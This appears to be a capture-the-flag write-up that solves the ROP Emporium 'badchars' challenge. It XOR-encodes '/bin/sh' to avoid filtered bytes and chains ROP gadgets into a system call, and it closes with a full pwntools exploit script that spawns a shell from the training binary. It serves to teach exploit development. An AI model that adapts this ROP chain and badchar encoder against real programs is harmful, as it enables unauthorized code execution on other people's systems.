A bad character (badchar) is a byte that the target application filters or mangles, so a payload containing it breaks. The set of bad characters differs from program to program, depending on the application and on how the developer handles input. Let’s see one of the possible ways to work around those bad characters and get a shell.
In exploit development, you frequently come across bad characters and you usually deal with them with the help of various encoders. After all, badchars are the reason that encoders such as shikata-ga-nai exist.
So, to demonstrate how to deal with badchars, I’ve picked the badchars challenge from ROP Emporium. You can download the challenge from here.
After extracting the downloaded zip, we have 2 files.

Running ‘file badchars’ confirms that the ELF is 64-bit.
So let’s execute the ELF and see what it’s got.

The output wasn’t different in any case, so we’ll have to figure out another way.
One thing I’d like to mention here is that I will be switching between gdb and r2 from time to time, because some tasks are much simpler in one tool than in the other. If you are new to them, I’d suggest going through some basic tutorials for these tools, which I’ve attached as hyperlinks on the keywords.
Let’s just have a look at the functions that are present in the ELF.

The first thing which I notice is usefulGadgets, maybe it has something that I need in order to deal with badchars.
Let’s disassemble this function.

It contains xor BYTE PTR [r15],r14b which is interesting and I’ll come to that as well in the later section. Let’s just make a note of it and move forward to other functions.
After disassembling usefulFunction,

What I notice here is that, we need to call system at 0x4006f0.
This means I’ll have to figure out a way where I can write my string, and call system@plt using the written string as the argument to achieve something.
Now, I’ll use r2 to gather some more information about this ELF, because I think I might find something more than just the address for system@plt in usefulFunction.
On disassembling the function in radare2,

Let’s just zoom into this picture,

There is a string that is getting pushed which is ‘/bin/sh’. Now if you’re unaware about ‘/bin/sh’, according to an answer on an online forum, “/bin/sh is an executable representing the system shell. Actually, it is usually implemented as a symbolic link pointing to the executable for whichever shell is the system shell.”
But then again, we’re not allowed to simply write the string into the binary, because there is a check for badchars when you pass a string argument, which can be seen here.
gdb-peda$ pdis pwnme

One of the ways to avoid badchars is to encode the payload with XOR, because, if you remember, usefulGadgets gives us an xor instruction that can modify a byte in memory. More or less, the idea here is to encode the payload before sending it and then decode it after it has been written to memory.
We saw in the usefulGadgets disassembly that the 3rd instruction was a mov that operates on a QWORD, so we’ll make our string exactly 8 bytes long: that way it fills one 64-bit register and is written to memory with a single mov. Thus, let’s make it /bin/sh\x00.
‘\x00’ is just a null character, which terminates the string and also pads it to 8 bytes.
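A quick way to convince yourself that the string really fills one QWORD is to pack it the way the CPU will see it. This is only a minimal sketch using Python's standard `struct` module; the variable names are mine and are not part of the challenge.

```python
import struct

shell_string = b"/bin/sh\x00"  # 7 visible characters plus the null terminator

# The string must be exactly 8 bytes to fill one 64-bit register.
assert len(shell_string) == 8

# "<Q" is a little-endian unsigned 64-bit integer, which is how x86-64
# interprets 8 bytes popped from the stack into a register such as r12.
(as_qword,) = struct.unpack("<Q", shell_string)
print(hex(as_qword))  # 0x68732f6e69622f
```

The leading zero byte of the value is the null terminator, which is why the printed number has only 14 hex digits.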
What I have in mind is a Python script that XORs each character of the “/bin/sh\x00” string with a key (starting from 0x00 and increasing by 1 for as long as the result is in the badchars list) and then records which key each character was XOR-ed with.
First, let’s find the RIP offset using gdb.


So here, as we can see, the RSP is at offset 32, which means the saved return address (RIP) is 8 bytes past that: 32 + 8 = 40.
Okay, so now we have the RIP offset: 40.
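To make the offset concrete, here is a small sketch of what a payload with 40 bytes of padding looks like. It uses only the standard library, and the address is just an example value (the system call site noted earlier); the constant names are my own.

```python
import struct

RIP_OFFSET = 40               # offset found above: 32 + 8
EXAMPLE_ADDR = 0x4006f0       # example value only: the call to system noted earlier

junk = b"A" * RIP_OFFSET
payload = junk + struct.pack("<Q", EXAMPLE_ADDR)

# The 8 bytes right after the padding are what `ret` loads into RIP.
(overwritten_rip,) = struct.unpack("<Q", payload[RIP_OFFSET:RIP_OFFSET + 8])
print(len(payload), hex(overwritten_rip))  # 48 0x4006f0
```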
One more tool, I’d like to introduce here is objdump which will help us find the content of all section headers present in the ELF. We will use the command,
objdump -h badchars

As you can see, most of the sections are read-only, but further down there are some sections that are writable as well. I like using .data.
The .data section is writable. According to Wikipedia, “The data segment (also known as .data) is read-write, since the values of variables can be altered at run time”.
With this gadget 0x0000000000400b30 <+0>: xor BYTE PTR [r15],r14b we can XOR any byte in memory with the low byte of the r14 register. So we can easily brute-force a pair: a permitted character that goes into our string as a substitute, and a key byte such that the two XOR-ed together produce the restricted character that should be in the string.
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
These are the badchars. If a character, after being encoded with XOR, still lies in this list, we have to pick another key so that the encoded character is not in the list.
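Before encoding anything, it helps to see which bytes of a candidate string are actually rejected. The helper below is a hypothetical one of my own (`find_badchars` is not part of the challenge or of any library); it simply checks each byte against the list above.

```python
BADCHARS = bytes([0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73])  # b i c / space f n s

def find_badchars(data: bytes) -> list:
    """Return (index, byte) pairs for every badchar found in data."""
    return [(i, b) for i, b in enumerate(data) if b in BADCHARS]

print(find_badchars(b"/bin/sh\x00"))
# [(0, 47), (1, 98), (2, 105), (3, 110), (4, 47), (5, 115)]
```

Six of the eight bytes in "/bin/sh\x00" are rejected, which is why the string cannot be sent as-is.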
Now, I know the above statement may sound quite strange, but think of it like this: a simple function can list the combinations that, when XOR-ed together, give a specific character. Let’s see it for the character “p”.
The program for this would be as follows –

Now, this shows you 10 different combinations which when XOR-ed together will give you ‘p’ as the resultant character.
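A minimal sketch of such a function could look like the following. The function name and the choice of keys 1 to 10 are my assumptions, picked so that the output has 10 combinations; any other key range works the same way.

```python
def xor_pairs(target: str, keys=range(1, 11)):
    """For each key, return (substitute_char, key) such that
    ord(substitute_char) ^ key == ord(target)."""
    return [(chr(ord(target) ^ key), key) for key in keys]

pairs = xor_pairs("p")
for substitute, key in pairs:
    print(f"{substitute!r} ^ {key} = 'p'")
```

With these keys the substitutes for 'p' are the letters 'q' through 'z'; for instance 's' XOR 3 gives 'p', and equally 'p' XOR 3 gives 's'.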
To encode ‘/bin/sh\x00’, we’ll use a combination whose substitute character is not in the badchars list. For example, ‘s’ (0x73) is a badchar while ‘p’ (0x70) is not, and 0x70 XOR 3 = 0x73, so we can send ‘p’ in place of ‘s’ and then XOR that byte in memory with 3 to get ‘s’ back.
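The section below just initializes the variables: the string, the badchars array, and the .data section address. The section starts at 0x601070, but we’ll write 4 bytes after that, i.e. at 0x601074, because as far as I can tell 4 bytes will be consumed by the libc [system@plt] call. Starting at 0x601074 also keeps 0x73, which is in the badchars list, out of the addresses we send while decoding: 0x601073 would contain it.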
junk = "A" * 40
shell_string = "/bin/sh\x00"
encoded_shell_string = ""
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xored_value = [0x0]*8 # XOR valued array
position = 0
data_section_addr = 0x601074 # Address for the .data section
This section creates the encoded string using XOR: whenever an encoded character is a badchar, it tries the next key, and it saves the key each character was XOR-ed with.
# Encode the string using XOR
for i in shell_string:
    encoded = ord(i) ^ xored_value[position]
    while encoded in badchars:
        xored_value[position] += 1
        encoded = ord(i) ^ xored_value[position]
    encoded_shell_string += chr(encoded)
    position += 1
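The same loop can be sketched as a self-contained Python 3 function working on bytes, which makes it easy to check that decoding gives the original string back. The function name `xor_encode` is my own, and this is a sketch of the idea rather than a replacement for the script above.

```python
def xor_encode(data: bytes, badchars):
    """Return (encoded, keys) where encoded[i] == data[i] ^ keys[i]
    and no encoded byte is in badchars."""
    encoded = bytearray()
    keys = []
    for byte in data:
        key = 0
        # Try keys 0, 1, 2, ... until the encoded byte is allowed.
        while (byte ^ key) in badchars:
            key += 1
        encoded.append(byte ^ key)
        keys.append(key)
    return bytes(encoded), keys

badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
encoded, keys = xor_encode(b"/bin/sh\x00", badchars)
print(encoded, keys)  # b'.`ho.rh\x00' [1, 2, 1, 1, 1, 1, 0, 0]

# XOR-ing again with the same keys restores the original string.
decoded = bytes(e ^ k for e, k in zip(encoded, keys))
print(decoded)  # b'/bin/sh\x00'
```

Note that the keys are sent in the payload too, so a more careful version would also skip any key that is itself a badchar. With this list the keys never go above 2, so it does not matter here.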
Now is where the fun part begins. We will make use of the ROP gadgets that are present within the ELF and use certain registers to temporarily hold our values, so that we can perform push / pop operations on the stack with the help of those registers.
ROPgadget --binary badchars --only "mov|pop|ret"
This command will list all the gadgets or sequence of instructions to perform certain operations.

Pop registers r13 to hold the .data section address and r12 to hold the XOR’ed target string, this gadget pop r12; pop r13; ret is present at address 0x0000000000400b3b.
And when the time comes to decode the string, we’ll need another pair of registers to hold the XOR key and the address of the byte being decoded.
Let’s use the next gadget, pop r14 ; pop r15 ; ret, at address 0x0000000000400b40.
So in a nutshell, what we are going to do here is:
- Pop registers r13 and r12 to hold the .data address and the XOR’ed target string respectively.
- Write (mov) the string held by r12 to the .data section address held by r13.
- For each byte of the string, pop the XOR key into r14 and the byte’s address into r15, then decode (XOR) it in place.
- Pop rdi (first parameter to system) to hold the location of the target string in the .data section.
- Call system which will have the location of target string which is ‘/bin/sh\x00’.
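The steps above can be sketched as a tiny simulation that walks the chain the way the CPU would, using a dictionary as fake memory. This is purely illustrative: `run_chain` is a hypothetical helper of mine that only understands the five gadgets used in this write-up, and the encoded string and keys are the ones the encoding loop produces for this badchars list.

```python
import struct

# Gadget and section addresses as quoted in this write-up.
POP_R12_R13 = 0x400b3b   # pop r12; pop r13; ret
MOV_R13_R12 = 0x400b34   # mov qword ptr [r13], r12; ret
POP_R14_R15 = 0x400b40   # pop r14; pop r15; ret
XOR_R15_R14 = 0x400b30   # xor byte ptr [r15], r14b; ret
POP_RDI = 0x400b39       # pop rdi; ret
SYSTEM = 0x4006f0        # call to system in usefulFunction
DATA = 0x601074          # writable target address

def run_chain(chain):
    """Interpret a list of 64-bit stack slots as a ROP chain and return
    the C string rdi points to when system is reached."""
    stack = list(chain)
    regs = {}
    mem = {}  # sparse fake memory: address -> byte value

    def pop():
        return stack.pop(0)

    while stack:
        gadget = pop()  # `ret` takes the next slot as the address to run
        if gadget == POP_R12_R13:
            regs["r12"], regs["r13"] = pop(), pop()
        elif gadget == MOV_R13_R12:
            for i, b in enumerate(struct.pack("<Q", regs["r12"])):
                mem[regs["r13"] + i] = b
        elif gadget == POP_R14_R15:
            regs["r14"], regs["r15"] = pop(), pop()
        elif gadget == XOR_R15_R14:
            mem[regs["r15"]] ^= regs["r14"] & 0xFF  # r14b is the low byte of r14
        elif gadget == POP_RDI:
            regs["rdi"] = pop()
        elif gadget == SYSTEM:
            addr, out = regs["rdi"], bytearray()
            while mem[addr] != 0:  # read up to the null terminator
                out.append(mem[addr])
                addr += 1
            return bytes(out)
        else:
            raise ValueError(f"unknown gadget {gadget:#x}")
    return None

encoded = b".`ho.rh\x00"          # XOR-encoded "/bin/sh\x00"
keys = [1, 2, 1, 1, 1, 1, 0, 0]   # per-byte XOR keys

chain = [POP_R12_R13, struct.unpack("<Q", encoded)[0], DATA, MOV_R13_R12]
for i, key in enumerate(keys):
    chain += [POP_R14_R15, key, DATA + i, XOR_R15_R14]
chain += [POP_RDI, DATA, SYSTEM]

result = run_chain(chain)
print(result)  # b'/bin/sh'
```

Running the chain against fake memory like this is a cheap way to catch a wrong key or a swapped register before touching the real binary.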
The script for writing the encoded string to the .data section using pop r12; pop r13; ret is
rop = p64(0x0000000000400b3b) # pop r12; pop r13; ret
rop += encoded_shell_string
rop += p64(data_section_addr) # Address of.data section
rop += p64(0x0000000000400b34) # mov qword ptr [r13], r12 ; ret
The script for decoding the string:
temp = data_section_addr
for i in range(0, 8):
    rop += p64(0x0000000000400b40) # pop r14 ; pop r15 ; ret
    rop += p64(xored_value[i]) # the xored_value
    rop += p64(temp) # Address of .data section
    rop += p64(0x0000000000400b30) # xor byte ptr [r15],r14b; ret
    temp += 1 # Move 1 byte
The final step is to pop the rdi, to hold the location of the string in .data section.
rop += p64(0x0000000000400b39) # pop rdi; ret
system_call_addr = p64(0x4006f0)
p = process("./badchars")
payload = junk + rop + p64(data_section_addr) + system_call_addr
p.sendlineafter("s\n> ", payload)
p.interactive()
So, if I club everything together, the final exploit will be:
#!/usr/bin/python
# Written for Python 2 with pwntools: str values and p64() output are concatenated directly.
import sys
from pwn import *

junk = "A" * 40
shell_string = "/bin/sh\x00"
encoded_shell_string = ""
badchars = [0x62, 0x69, 0x63, 0x2f, 0x20, 0x66, 0x6e, 0x73]
xored_value = [0x0]*8 #XOR valued array
position = 0
data_section_addr = 0x601074 #Address for the .data section

# Encode the string using XOR
for i in shell_string:
    encoded = ord(i) ^ xored_value[position]
    while encoded in badchars:
        xored_value[position] += 1
        encoded = ord(i) ^ xored_value[position]
    encoded_shell_string += chr(encoded)
    position += 1

# Write the encoded string to the .data section
rop = p64(0x0000000000400b3b) # pop r12; pop r13; ret
rop += encoded_shell_string
rop += p64(data_section_addr) # Address of .data section
rop += p64(0x0000000000400b34) # mov qword ptr [r13], r12 ; ret

# Decode the string in place, one byte at a time
temp = data_section_addr
for i in range(0, 8):
    rop += p64(0x0000000000400b40) # pop r14 ; pop r15 ; ret
    rop += p64(xored_value[i]) # the xored_value
    rop += p64(temp) # Address of .data section
    rop += p64(0x0000000000400b30) # xor byte ptr [r15],r14b; ret
    temp += 1 # Move 1 byte

# Point rdi at the decoded string and call system
rop += p64(0x0000000000400b39) # pop rdi; ret
system_call_addr = p64(0x4006f0)
p = process("./badchars")
payload = junk + rop + p64(data_section_addr) + system_call_addr
p.sendlineafter("s\n> ", payload)
p.interactive()
If you run this exploit, it will look something like the image below.

This confirms that, despite all the badchars, we were still able to pass /bin/sh\x00 to the system call (ret2libc) and get a shell.
Exploit development and reverse engineering require a lot of knowledge spread across a number of subjects and are specific to the hardware architecture. After reading this, chances are that some things might be unclear, and that is completely fine. What I’d suggest in that case is that wherever you feel stuck, you read about that concept, see how it’s implemented, and then come back to this problem.
If you have any queries, don’t hesitate to drop me a message at https://twitter.com/0xINT3
Thanks for reading!